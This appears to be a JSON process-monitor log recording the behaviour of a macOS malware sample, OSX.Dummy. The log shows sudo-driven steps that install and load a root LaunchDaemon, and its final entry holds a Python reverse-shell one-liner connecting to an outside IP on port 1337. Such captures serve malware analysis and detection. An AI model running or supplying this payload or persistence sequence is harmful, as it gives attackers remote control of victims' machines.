{ "process_name": "/Users/zingo123/Downloads/OSX.Dummy/script", "pid": 2607, "command_line_args": "./script", "child_processes": [ { "process_name": "/usr/bin/sudo", "pid": 2608, "command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# chown root /tmp/script.sh", "child_processes": [ { "process_name": "/usr/sbin/chown", "pid": 2610, "command_line_args": "chown root /tmp/script.sh" } ] }, { "process_name": "/bin/sh", "pid": 2609, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2609, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/usr/bin/sudo", "pid": 2611, "command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# chmod +x /tmp/script.sh", "child_processes": [ { "process_name": "/bin/chmod", "pid": 2613, "command_line_args": "chmod +x /tmp/script.sh" } ] }, { "process_name": "/bin/sh", "pid": 2612, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2612, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/usr/bin/sudo", "pid": 2614, "command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# mv /tmp/script.sh /var/root/", "child_processes": [ { "process_name": "/bin/mv", "pid": 2617, "command_line_args": "mv /tmp/script.sh /var/root/" } ] }, { "process_name": "/bin/sh", "pid": 2615, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2615, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2616, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2616, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/usr/bin/sudo", "pid": 2618, "command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# mv /tmp/com.startup.plist /Library/LaunchDaemons/", "child_processes": [ { "process_name": "/bin/mv", "pid": 2621, "command_line_args": "mv /tmp/com.startup.plist /Library/LaunchDaemons/" } ] }, { "process_name": "/bin/sh", "pid": 2619, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2619, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2620, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2620, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2622, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2622, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/usr/bin/sudo", "pid": 2623, "command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# chown root /Library/LaunchDaemons/com.startup.plist", "child_processes": [ { "process_name": "/usr/sbin/chown", "pid": 2626, "command_line_args": "chown root /Library/LaunchDaemons/com.startup.plist" } ] }, { "process_name": "/bin/sh", "pid": 2624, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2624, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2625, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2625, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/usr/bin/sudo", "pid": 2627, "command_line_args": "/usr/bin/sudo -S -p #node-sudo-passwd# launchctl load -w /Library/LaunchDaemons/com.startup.plist", "child_processes": [ { "process_name": "/bin/launchctl", "pid": 2629, "command_line_args": "launchctl load -w /Library/LaunchDaemons/com.startup.plist" } ] }, { "process_name": "/bin/sh", "pid": 2628, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2628, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2630, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2630, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2633, "command_line_args": "/bin/sh -c ps -eo pid,comm" }, { "process_name": "/bin/sh", "pid": 2633, "command_line_args": "/bin/sh -c ps -eo pid,comm" } ] } { "process_name": "/dev/console", "pid": 2631, "command_line_args": "xpcproxy com.startup", "child_processes": [ { "process_name": "/usr/bin/python", "pid": 2632, "command_line_args": "python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"185.243.115.230\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);" } ] }